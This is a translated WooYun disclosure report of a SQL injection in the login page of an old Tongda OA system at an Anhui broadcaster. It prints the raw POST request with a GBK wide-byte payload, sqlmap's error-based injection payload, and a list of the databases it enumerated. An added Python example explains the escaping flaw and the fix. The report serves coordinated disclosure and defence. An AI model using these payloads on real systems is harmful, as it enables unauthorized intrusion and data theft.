Vulnerability summary

Defect ID: wooyun-2015-0155085

Title: Anhui Broadcasting OA office system vulnerability # full database information leak

Related vendor: CNCERT National Internet Emergency Center (cncert国家互联网应急中心)

Author: 路人甲

Submitted: 2015-11-23 11:54

Fixed: 2016-01-11 15:32

Disclosed: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner organization (CNCERT National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-23: Details sent to the vendor; awaiting vendor handling
2015-11-27: Vendor has confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and domain experts
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

0x01 Vulnerable location

http://**.**.**.**/


0x02 Vulnerability type

SQL injection


An old-version Tongda OA issue
0x03 Vulnerability details
First, I referred to an earlier researcher's write-up:

http://**.**.**.**/bugs/wooyun-2010-078915


and found a POST injection in the login page:

PASSWORD=g00dPa%24%24w0rD&submit=%b5%c7%20%c2%bc&UI=0&UNAME=%bf%27




0x04 Vulnerable request parameters
So I used the injection method from that write-up:

POST /logincheck.php HTTP/1.1
Host: **.**.**.**
Content-Length: 47
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: PHPSESSID=60491e719c9eb87a488878cc39fd0c34

PASSWORD=g00dPa%24%24w0rD&submit=%b5%c7%20%c2%bc&UI=0&UNAME=%bf%27


0x05 Injection method
After using the wide-byte trick, just hand it to sqlmap and let it run.
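Why the wide-byte value UNAME=%bf%27 gets past the escaping, as an added example that is not part of the original report or of Tongda OA's code. It assumes the login handler escapes the raw POST bytes addslashes()-style while the MySQL connection charset is GBK (the report does not state the application's exact escaping), and contrasts that with charset-aware escaping of the kind mysqli_real_escape_string performs after mysqli_set_charset; the assumed addslashes()-style behaviour is reproduced with the helper below.

```python
# Added example, not from the original report. Assumptions: the application
# escapes raw bytes addslashes()-style, and the MySQL connection charset is GBK.
from urllib.parse import unquote_to_bytes

# Characters PHP's addslashes() and MySQL's escaping turn into backslash sequences.
_BYTE_ESCAPES = {0x27: b"\\'", 0x22: b'\\"', 0x5C: b"\\\\", 0x00: b"\\0"}
_CHAR_ESCAPES = {"'": "\\'", '"': '\\"', "\\": "\\\\", "\x00": "\\0"}

def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping like PHP addslashes(): it never looks at the charset,
    so it happily inserts 0x5C right after a lone GBK lead byte such as 0xBF."""
    return b"".join(_BYTE_ESCAPES.get(b, bytes([b])) for b in raw)

def escape_charset_aware(raw: bytes, charset: str) -> bytes:
    """Escape at the character level of the connection charset: decode first
    (a lone lead byte becomes U+FFFD instead of pairing with the backslash),
    escape, then re-encode."""
    text = raw.decode(charset, errors="replace")
    return "".join(_CHAR_ESCAPES.get(c, c) for c in text).encode(charset, errors="replace")

def server_sees_unescaped_quote(escaped: bytes, charset: str) -> bool:
    """Decode the escaped bytes the way the server does in `charset` and report
    whether a single quote is still live (not preceded by a backslash character)."""
    text = escaped.decode(charset, errors="replace")
    i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2          # the backslash consumes the following character
            continue
        if text[i] == "'":
            return True
        i += 1
    return False

if __name__ == "__main__":
    payload = unquote_to_bytes("%bf%27")   # the UNAME value from the request above
    naive = addslashes(payload)            # 0xBF 0x5C 0x27: 0xBF5C is one GBK character
    print("addslashes, GBK connection   :", server_sees_unescaped_quote(naive, "gbk"))
    print("addslashes, UTF-8 connection :", server_sees_unescaped_quote(naive, "utf-8"))
    safe = escape_charset_aware(payload, "gbk")
    print("charset-aware, GBK connection:", server_sees_unescaped_quote(safe, "gbk"))
```

Escaping alone, even charset-aware, is a mitigation for this specific gap; the durable fix is parameterized queries plus the vendor upgrade the report recommends.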

Proof of vulnerability:

0x06 Test results

---
Place: POST
Parameter: UNAME
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: PASSWORD=g00dPa$$w0rD&submit=%b5%c7 %c2%bc&UI=0&UNAME=%bf' AND (SELECT 7167 FROM(SELECT COUNT(*),CONCAT(0x71736f7671,(SELECT (CASE WHEN (7167=7167) THEN 1 ELSE 0 END)),0x71656e7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hBls
---
[20:33:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.14, Apache 2.2.16
back-end DBMS: MySQL 5.0
available databases [5]:
[*] BUS
[*] crscell
[*] information_schema
[*] mysql
[*] TD_OA


Here I only dumped the administrator (user) table:

Database: TD_OA
Table: user
[7 entries]


OK, all of the database information can be retrieved...

Fix recommendation:

Upgrade!!!

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-11-27 10:18

Vendor reply:

CNVD has confirmed and reproduced the described vulnerability; it has been forwarded through CNCERT to the Anhui branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet